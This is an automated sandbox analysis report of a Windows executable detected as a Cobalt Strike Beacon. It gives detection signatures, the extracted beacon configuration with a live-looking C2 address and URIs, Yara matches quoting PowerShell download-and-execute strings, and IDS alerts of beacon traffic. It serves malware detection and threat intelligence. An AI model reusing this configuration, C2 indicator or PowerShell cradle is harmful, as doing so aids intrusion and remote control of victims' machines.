Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yZah650lHL.exe

Overview

General Information

Sample name:yZah650lHL.exe
renamed because original name is a hash value
Original sample name:5ed55475a1fe6c18c1a67fa8c7008661.exe
Analysis ID:1583548
MD5:5ed55475a1fe6c18c1a67fa8c7008661
SHA1:4ecc93379148eefce19f8f6ded6d141f7100bbcb
SHA256:57a370d35e41f662454ba59baeddf042cb536c75e92e6022a63de197fd1377ba
Tags:CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found potential dummy code loops (likely to delay analysis)
Installs new ROOT certificates
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yZah650lHL.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\yZah650lHL.exe" MD5: 5ED55475A1FE6C18C1A67FA8C7008661)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "42.192.3.170,/dpixel", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
    00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
      • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
      • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
      • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
      • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
      • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
      • 0x32d6a:$a11: Could not open service control manager on %s: %d
      • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
      • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
      • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
      • 0x33255:$a15: could not create remote thread in %d: %d
      • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33203:$a17: could not write to process memory: %d
      • 0x32d9b:$a18: Could not create service %s on %s: %d
      • 0x32e24:$a19: Could not delete service %s on %s: %d
      • 0x32c89:$a20: Could not open process token: %d (%u)
      00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
      • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
      00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
      • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.yZah650lHL.exe.660000.2.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        0.2.yZah650lHL.exe.660000.2.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          0.2.yZah650lHL.exe.660000.2.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
          • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
          • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
          • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
          • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
          • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
          • 0x32d6a:$a11: Could not open service control manager on %s: %d
          • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
          • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
          • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
          • 0x33255:$a15: could not create remote thread in %d: %d
          • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x33203:$a17: could not write to process memory: %d
          • 0x32d9b:$a18: Could not create service %s on %s: %d
          • 0x32e24:$a19: Could not delete service %s on %s: %d
          • 0x32c89:$a20: Could not open process token: %d (%u)
          0.2.yZah650lHL.exe.660000.2.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
          • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
          0.2.yZah650lHL.exe.660000.2.raw.unpackWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
          • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
          • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
          Click to see the 40 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-03T02:51:56.875620+010020287653Unknown Traffic192.168.2.44973042.192.3.170443TCP
          2025-01-03T02:51:58.765791+010020287653Unknown Traffic192.168.2.44973142.192.3.170443TCP
          2025-01-03T02:52:00.609740+010020287653Unknown Traffic192.168.2.44973242.192.3.170443TCP
          2025-01-03T02:52:02.459943+010020287653Unknown Traffic192.168.2.44973342.192.3.170443TCP
          2025-01-03T02:52:04.479805+010020287653Unknown Traffic192.168.2.44973442.192.3.170443TCP
          2025-01-03T02:52:06.304212+010020287653Unknown Traffic192.168.2.44973542.192.3.170443TCP
          2025-01-03T02:52:08.143921+010020287653Unknown Traffic192.168.2.44973642.192.3.170443TCP
          2025-01-03T02:52:10.004886+010020287653Unknown Traffic192.168.2.44973742.192.3.170443TCP
          2025-01-03T02:52:11.906367+010020287653Unknown Traffic192.168.2.44973842.192.3.170443TCP
          2025-01-03T02:52:13.800790+010020287653Unknown Traffic192.168.2.44974042.192.3.170443TCP
          2025-01-03T02:52:15.681023+010020287653Unknown Traffic192.168.2.44974542.192.3.170443TCP
          2025-01-03T02:52:17.533678+010020287653Unknown Traffic192.168.2.44974742.192.3.170443TCP
          2025-01-03T02:52:19.377034+010020287653Unknown Traffic192.168.2.44974842.192.3.170443TCP
          2025-01-03T02:52:21.290288+010020287653Unknown Traffic192.168.2.44974942.192.3.170443TCP
          2025-01-03T02:52:23.132550+010020287653Unknown Traffic192.168.2.44975042.192.3.170443TCP
          2025-01-03T02:52:24.960448+010020287653Unknown Traffic192.168.2.44975142.192.3.170443TCP
          2025-01-03T02:52:26.934786+010020287653Unknown Traffic192.168.2.44975242.192.3.170443TCP
          2025-01-03T02:52:28.868789+010020287653Unknown Traffic192.168.2.44975342.192.3.170443TCP
          2025-01-03T02:52:30.748298+010020287653Unknown Traffic192.168.2.44975442.192.3.170443TCP
          2025-01-03T02:52:32.612508+010020287653Unknown Traffic192.168.2.44975542.192.3.170443TCP
          2025-01-03T02:52:34.487539+010020287653Unknown Traffic192.168.2.44975642.192.3.170443TCP
          2025-01-03T02:52:36.367609+010020287653Unknown Traffic192.168.2.44975742.192.3.170443TCP
          2025-01-03T02:52:38.608799+010020287653Unknown Traffic192.168.2.44975842.192.3.170443TCP
          2025-01-03T02:52:40.510999+010020287653Unknown Traffic192.168.2.44975942.192.3.170443TCP
          2025-01-03T02:52:42.342806+010020287653Unknown Traffic192.168.2.44976042.192.3.170443TCP
          2025-01-03T02:52:44.395427+010020287653Unknown Traffic192.168.2.44976142.192.3.170443TCP
          2025-01-03T02:52:46.273307+010020287653Unknown Traffic192.168.2.44976242.192.3.170443TCP
          2025-01-03T02:52:48.160470+010020287653Unknown Traffic192.168.2.44976342.192.3.170443TCP
          2025-01-03T02:52:50.022092+010020287653Unknown Traffic192.168.2.44976442.192.3.170443TCP
          2025-01-03T02:52:51.872722+010020287653Unknown Traffic192.168.2.44976542.192.3.170443TCP
          2025-01-03T02:52:53.768814+010020287653Unknown Traffic192.168.2.44976742.192.3.170443TCP
          2025-01-03T02:52:55.644673+010020287653Unknown Traffic192.168.2.44976942.192.3.170443TCP
          2025-01-03T02:52:57.491980+010020287653Unknown Traffic192.168.2.44978042.192.3.170443TCP
          2025-01-03T02:52:59.326849+010020287653Unknown Traffic192.168.2.44979442.192.3.170443TCP
          2025-01-03T02:53:01.193983+010020287653Unknown Traffic192.168.2.44980742.192.3.170443TCP
          2025-01-03T02:53:03.169984+010020287653Unknown Traffic192.168.2.44981942.192.3.170443TCP
          2025-01-03T02:53:05.089067+010020287653Unknown Traffic192.168.2.44983242.192.3.170443TCP
          2025-01-03T02:53:06.954602+010020287653Unknown Traffic192.168.2.44984442.192.3.170443TCP
          2025-01-03T02:53:08.831304+010020287653Unknown Traffic192.168.2.44985642.192.3.170443TCP
          2025-01-03T02:53:10.705986+010020287653Unknown Traffic192.168.2.44986542.192.3.170443TCP
          2025-01-03T02:53:12.605615+010020287653Unknown Traffic192.168.2.44987942.192.3.170443TCP
          2025-01-03T02:53:14.519078+010020287653Unknown Traffic192.168.2.44989242.192.3.170443TCP
          2025-01-03T02:53:16.352101+010020287653Unknown Traffic192.168.2.44990542.192.3.170443TCP
          2025-01-03T02:53:18.174364+010020287653Unknown Traffic192.168.2.44991842.192.3.170443TCP
          2025-01-03T02:53:20.055916+010020287653Unknown Traffic192.168.2.44993042.192.3.170443TCP
          2025-01-03T02:53:22.174601+010020287653Unknown Traffic192.168.2.44994542.192.3.170443TCP
          2025-01-03T02:53:24.032385+010020287653Unknown Traffic192.168.2.44995742.192.3.170443TCP
          2025-01-03T02:53:25.889720+010020287653Unknown Traffic192.168.2.44996642.192.3.170443TCP
          2025-01-03T02:53:27.910600+010020287653Unknown Traffic192.168.2.44998242.192.3.170443TCP
          2025-01-03T02:53:29.771374+010020287653Unknown Traffic192.168.2.44999342.192.3.170443TCP
          2025-01-03T02:53:31.654400+010020287653Unknown Traffic192.168.2.45000542.192.3.170443TCP
          2025-01-03T02:53:33.575904+010020287653Unknown Traffic192.168.2.45001642.192.3.170443TCP
          2025-01-03T02:53:35.459183+010020287653Unknown Traffic192.168.2.45003042.192.3.170443TCP
          2025-01-03T02:53:37.306900+010020287653Unknown Traffic192.168.2.45003842.192.3.170443TCP
          2025-01-03T02:53:39.119334+010020287653Unknown Traffic192.168.2.45005242.192.3.170443TCP
          2025-01-03T02:53:40.934854+010020287653Unknown Traffic192.168.2.45005742.192.3.170443TCP
          2025-01-03T02:53:42.786093+010020287653Unknown Traffic192.168.2.45005842.192.3.170443TCP
          2025-01-03T02:53:44.637615+010020287653Unknown Traffic192.168.2.45005942.192.3.170443TCP
          2025-01-03T02:53:46.485393+010020287653Unknown Traffic192.168.2.45006042.192.3.170443TCP
          2025-01-03T02:53:48.508834+010020287653Unknown Traffic192.168.2.45006142.192.3.170443TCP
          2025-01-03T02:53:50.361140+010020287653Unknown Traffic192.168.2.45006242.192.3.170443TCP
          2025-01-03T02:53:54.865123+010020287653Unknown Traffic192.168.2.45006342.192.3.170443TCP
          2025-01-03T02:53:56.243839+010020287653Unknown Traffic192.168.2.45006442.192.3.170443TCP
          2025-01-03T02:53:58.090992+010020287653Unknown Traffic192.168.2.45006542.192.3.170443TCP
          2025-01-03T02:53:59.955837+010020287653Unknown Traffic192.168.2.45006642.192.3.170443TCP
          2025-01-03T02:54:01.841278+010020287653Unknown Traffic192.168.2.45006742.192.3.170443TCP
          2025-01-03T02:54:03.669405+010020287653Unknown Traffic192.168.2.45006842.192.3.170443TCP
          2025-01-03T02:54:05.659716+010020287653Unknown Traffic192.168.2.45006942.192.3.170443TCP
          2025-01-03T02:54:07.745043+010020287653Unknown Traffic192.168.2.45007042.192.3.170443TCP
          2025-01-03T02:54:09.748438+010020287653Unknown Traffic192.168.2.45007142.192.3.170443TCP
          2025-01-03T02:54:11.777021+010020287653Unknown Traffic192.168.2.45007242.192.3.170443TCP
          2025-01-03T02:54:13.735289+010020287653Unknown Traffic192.168.2.45007342.192.3.170443TCP
          2025-01-03T02:54:15.743425+010020287653Unknown Traffic192.168.2.45007442.192.3.170443TCP
          2025-01-03T02:54:18.133263+010020287653Unknown Traffic192.168.2.45007542.192.3.170443TCP
          2025-01-03T02:54:20.003252+010020287653Unknown Traffic192.168.2.45007642.192.3.170443TCP
          2025-01-03T02:54:21.879037+010020287653Unknown Traffic192.168.2.45007742.192.3.170443TCP
          2025-01-03T02:54:23.927573+010020287653Unknown Traffic192.168.2.45007842.192.3.170443TCP
          2025-01-03T02:54:25.831611+010020287653Unknown Traffic192.168.2.45007942.192.3.170443TCP
          2025-01-03T02:54:27.701056+010020287653Unknown Traffic192.168.2.45008042.192.3.170443TCP
          2025-01-03T02:54:29.777041+010020287653Unknown Traffic192.168.2.45008142.192.3.170443TCP
          2025-01-03T02:54:31.708847+010020287653Unknown Traffic192.168.2.45008242.192.3.170443TCP
          2025-01-03T02:54:33.543669+010020287653Unknown Traffic192.168.2.45008342.192.3.170443TCP
          2025-01-03T02:54:35.757294+010020287653Unknown Traffic192.168.2.45008442.192.3.170443TCP
          2025-01-03T02:54:37.718497+010020287653Unknown Traffic192.168.2.45008542.192.3.170443TCP
          2025-01-03T02:54:39.513124+010020287653Unknown Traffic192.168.2.45008642.192.3.170443TCP
          2025-01-03T02:54:41.450880+010020287653Unknown Traffic192.168.2.45008742.192.3.170443TCP
          2025-01-03T02:54:43.398318+010020287653Unknown Traffic192.168.2.45008842.192.3.170443TCP
          2025-01-03T02:54:45.352869+010020287653Unknown Traffic192.168.2.45008942.192.3.170443TCP
          2025-01-03T02:54:47.511034+010020287653Unknown Traffic192.168.2.45009042.192.3.170443TCP
          2025-01-03T02:54:49.332377+010020287653Unknown Traffic192.168.2.45009142.192.3.170443TCP
          2025-01-03T02:54:51.314481+010020287653Unknown Traffic192.168.2.45009242.192.3.170443TCP
          2025-01-03T02:54:53.433162+010020287653Unknown Traffic192.168.2.45009342.192.3.170443TCP
          2025-01-03T02:54:55.406669+010020287653Unknown Traffic192.168.2.45009442.192.3.170443TCP
          2025-01-03T02:54:57.301211+010020287653Unknown Traffic192.168.2.45009542.192.3.170443TCP
          2025-01-03T02:54:59.322381+010020287653Unknown Traffic192.168.2.45009642.192.3.170443TCP
          2025-01-03T02:55:01.192036+010020287653Unknown Traffic192.168.2.45009742.192.3.170443TCP
          2025-01-03T02:55:03.050730+010020287653Unknown Traffic192.168.2.45009842.192.3.170443TCP
          2025-01-03T02:55:04.940277+010020287653Unknown Traffic192.168.2.45009942.192.3.170443TCP
          2025-01-03T02:55:06.787758+010020287653Unknown Traffic192.168.2.45010042.192.3.170443TCP
          2025-01-03T02:55:08.649664+010020287653Unknown Traffic192.168.2.45010142.192.3.170443TCP
          2025-01-03T02:55:10.699158+010020287653Unknown Traffic192.168.2.45010242.192.3.170443TCP
          2025-01-03T02:55:12.622689+010020287653Unknown Traffic192.168.2.45010342.192.3.170443TCP
          2025-01-03T02:55:14.584849+010020287653Unknown Traffic192.168.2.45010442.192.3.170443TCP
          2025-01-03T02:55:16.485580+010020287653Unknown Traffic192.168.2.45010542.192.3.170443TCP
          2025-01-03T02:55:18.305220+010020287653Unknown Traffic192.168.2.45010642.192.3.170443TCP
          2025-01-03T02:55:20.171495+010020287653Unknown Traffic192.168.2.45010742.192.3.170443TCP
          2025-01-03T02:55:22.013367+010020287653Unknown Traffic192.168.2.45010842.192.3.170443TCP
          2025-01-03T02:55:23.909276+010020287653Unknown Traffic192.168.2.45010942.192.3.170443TCP
          2025-01-03T02:55:25.733052+010020287653Unknown Traffic192.168.2.45011042.192.3.170443TCP
          2025-01-03T02:55:27.563217+010020287653Unknown Traffic192.168.2.45011142.192.3.170443TCP
          2025-01-03T02:55:29.416377+010020287653Unknown Traffic192.168.2.45011242.192.3.170443TCP
          2025-01-03T02:55:31.231220+010020287653Unknown Traffic192.168.2.45011342.192.3.170443TCP
          2025-01-03T02:55:33.062379+010020287653Unknown Traffic192.168.2.45011442.192.3.170443TCP
          2025-01-03T02:55:34.891221+010020287653Unknown Traffic192.168.2.45011542.192.3.170443TCP
          2025-01-03T02:55:36.737531+010020287653Unknown Traffic192.168.2.45011642.192.3.170443TCP
          2025-01-03T02:55:38.637655+010020287653Unknown Traffic192.168.2.45011742.192.3.170443TCP
          2025-01-03T02:55:40.511604+010020287653Unknown Traffic192.168.2.45011842.192.3.170443TCP
          2025-01-03T02:55:42.477792+010020287653Unknown Traffic192.168.2.45011942.192.3.170443TCP
          2025-01-03T02:55:44.310435+010020287653Unknown Traffic192.168.2.45012042.192.3.170443TCP
          2025-01-03T02:55:46.267183+010020287653Unknown Traffic192.168.2.45012142.192.3.170443TCP
          2025-01-03T02:55:48.135199+010020287653Unknown Traffic192.168.2.45012242.192.3.170443TCP
          2025-01-03T02:55:50.040503+010020287653Unknown Traffic192.168.2.45012342.192.3.170443TCP
          2025-01-03T02:55:51.934251+010020287653Unknown Traffic192.168.2.45012442.192.3.170443TCP
          2025-01-03T02:55:53.857595+010020287653Unknown Traffic192.168.2.45012542.192.3.170443TCP
          2025-01-03T02:55:55.704609+010020287653Unknown Traffic192.168.2.45012642.192.3.170443TCP
          2025-01-03T02:55:57.510561+010020287653Unknown Traffic192.168.2.45012742.192.3.170443TCP
          2025-01-03T02:55:59.842839+010020287653Unknown Traffic192.168.2.45012842.192.3.170443TCP
          2025-01-03T02:56:01.694383+010020287653Unknown Traffic192.168.2.45012942.192.3.170443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-03T02:51:57.452608+010020337131Targeted Malicious Activity was Detected192.168.2.44973042.192.3.170443TCP
          2025-01-03T02:51:59.302903+010020337131Targeted Malicious Activity was Detected192.168.2.44973142.192.3.170443TCP
          2025-01-03T02:52:01.163261+010020337131Targeted Malicious Activity was Detected192.168.2.44973242.192.3.170443TCP
          2025-01-03T02:52:03.165804+010020337131Targeted Malicious Activity was Detected192.168.2.44973342.192.3.170443TCP
          2025-01-03T02:52:05.017067+010020337131Targeted Malicious Activity was Detected192.168.2.44973442.192.3.170443TCP
          2025-01-03T02:52:06.835630+010020337131Targeted Malicious Activity was Detected192.168.2.44973542.192.3.170443TCP
          2025-01-03T02:52:08.674163+010020337131Targeted Malicious Activity was Detected192.168.2.44973642.192.3.170443TCP
          2025-01-03T02:52:10.561909+010020337131Targeted Malicious Activity was Detected192.168.2.44973742.192.3.170443TCP
          2025-01-03T02:52:12.486166+010020337131Targeted Malicious Activity was Detected192.168.2.44973842.192.3.170443TCP
          2025-01-03T02:52:14.354791+010020337131Targeted Malicious Activity was Detected192.168.2.44974042.192.3.170443TCP
          2025-01-03T02:52:16.215637+010020337131Targeted Malicious Activity was Detected192.168.2.44974542.192.3.170443TCP
          2025-01-03T02:52:18.083158+010020337131Targeted Malicious Activity was Detected192.168.2.44974742.192.3.170443TCP
          2025-01-03T02:52:19.928081+010020337131Targeted Malicious Activity was Detected192.168.2.44974842.192.3.170443TCP
          2025-01-03T02:52:21.861247+010020337131Targeted Malicious Activity was Detected192.168.2.44974942.192.3.170443TCP
          2025-01-03T02:52:23.663164+010020337131Targeted Malicious Activity was Detected192.168.2.44975042.192.3.170443TCP
          2025-01-03T02:52:25.493218+010020337131Targeted Malicious Activity was Detected192.168.2.44975142.192.3.170443TCP
          2025-01-03T02:52:27.476494+010020337131Targeted Malicious Activity was Detected192.168.2.44975242.192.3.170443TCP
          2025-01-03T02:52:29.424717+010020337131Targeted Malicious Activity was Detected192.168.2.44975342.192.3.170443TCP
          2025-01-03T02:52:31.288548+010020337131Targeted Malicious Activity was Detected192.168.2.44975442.192.3.170443TCP
          2025-01-03T02:52:33.167348+010020337131Targeted Malicious Activity was Detected192.168.2.44975542.192.3.170443TCP
          2025-01-03T02:52:35.039001+010020337131Targeted Malicious Activity was Detected192.168.2.44975642.192.3.170443TCP
          2025-01-03T02:52:36.928785+010020337131Targeted Malicious Activity was Detected192.168.2.44975742.192.3.170443TCP
          2025-01-03T02:52:39.215322+010020337131Targeted Malicious Activity was Detected192.168.2.44975842.192.3.170443TCP
          2025-01-03T02:52:41.046511+010020337131Targeted Malicious Activity was Detected192.168.2.44975942.192.3.170443TCP
          2025-01-03T02:52:42.869377+010020337131Targeted Malicious Activity was Detected192.168.2.44976042.192.3.170443TCP
          2025-01-03T02:52:44.949824+010020337131Targeted Malicious Activity was Detected192.168.2.44976142.192.3.170443TCP
          2025-01-03T02:52:46.833517+010020337131Targeted Malicious Activity was Detected192.168.2.44976242.192.3.170443TCP
          2025-01-03T02:52:48.707530+010020337131Targeted Malicious Activity was Detected192.168.2.44976342.192.3.170443TCP
          2025-01-03T02:52:50.576678+010020337131Targeted Malicious Activity was Detected192.168.2.44976442.192.3.170443TCP
          2025-01-03T02:52:52.413767+010020337131Targeted Malicious Activity was Detected192.168.2.44976542.192.3.170443TCP
          2025-01-03T02:52:54.321871+010020337131Targeted Malicious Activity was Detected192.168.2.44976742.192.3.170443TCP
          2025-01-03T02:52:56.200010+010020337131Targeted Malicious Activity was Detected192.168.2.44976942.192.3.170443TCP
          2025-01-03T02:52:58.023540+010020337131Targeted Malicious Activity was Detected192.168.2.44978042.192.3.170443TCP
          2025-01-03T02:52:59.868444+010020337131Targeted Malicious Activity was Detected192.168.2.44979442.192.3.170443TCP
          2025-01-03T02:53:01.752494+010020337131Targeted Malicious Activity was Detected192.168.2.44980742.192.3.170443TCP
          2025-01-03T02:53:03.774755+010020337131Targeted Malicious Activity was Detected192.168.2.44981942.192.3.170443TCP
          2025-01-03T02:53:05.624502+010020337131Targeted Malicious Activity was Detected192.168.2.44983242.192.3.170443TCP
          2025-01-03T02:53:07.506477+010020337131Targeted Malicious Activity was Detected192.168.2.44984442.192.3.170443TCP
          2025-01-03T02:53:09.385767+010020337131Targeted Malicious Activity was Detected192.168.2.44985642.192.3.170443TCP
          2025-01-03T02:53:11.259694+010020337131Targeted Malicious Activity was Detected192.168.2.44986542.192.3.170443TCP
          2025-01-03T02:53:13.190361+010020337131Targeted Malicious Activity was Detected192.168.2.44987942.192.3.170443TCP
          2025-01-03T02:53:15.073802+010020337131Targeted Malicious Activity was Detected192.168.2.44989242.192.3.170443TCP
          2025-01-03T02:53:16.883379+010020337131Targeted Malicious Activity was Detected192.168.2.44990542.192.3.170443TCP
          2025-01-03T02:53:18.705554+010020337131Targeted Malicious Activity was Detected192.168.2.44991842.192.3.170443TCP
          2025-01-03T02:53:20.615367+010020337131Targeted Malicious Activity was Detected192.168.2.44993042.192.3.170443TCP
          2025-01-03T02:53:22.721820+010020337131Targeted Malicious Activity was Detected192.168.2.44994542.192.3.170443TCP
          2025-01-03T02:53:24.580494+010020337131Targeted Malicious Activity was Detected192.168.2.44995742.192.3.170443TCP
          2025-01-03T02:53:26.423903+010020337131Targeted Malicious Activity was Detected192.168.2.44996642.192.3.170443TCP
          2025-01-03T02:53:28.466662+010020337131Targeted Malicious Activity was Detected192.168.2.44998242.192.3.170443TCP
          2025-01-03T02:53:30.319330+010020337131Targeted Malicious Activity was Detected192.168.2.44999342.192.3.170443TCP
          2025-01-03T02:53:32.224862+010020337131Targeted Malicious Activity was Detected192.168.2.45000542.192.3.170443TCP
          2025-01-03T02:53:34.150666+010020337131Targeted Malicious Activity was Detected192.168.2.45001642.192.3.170443TCP
          2025-01-03T02:53:36.016397+010020337131Targeted Malicious Activity was Detected192.168.2.45003042.192.3.170443TCP
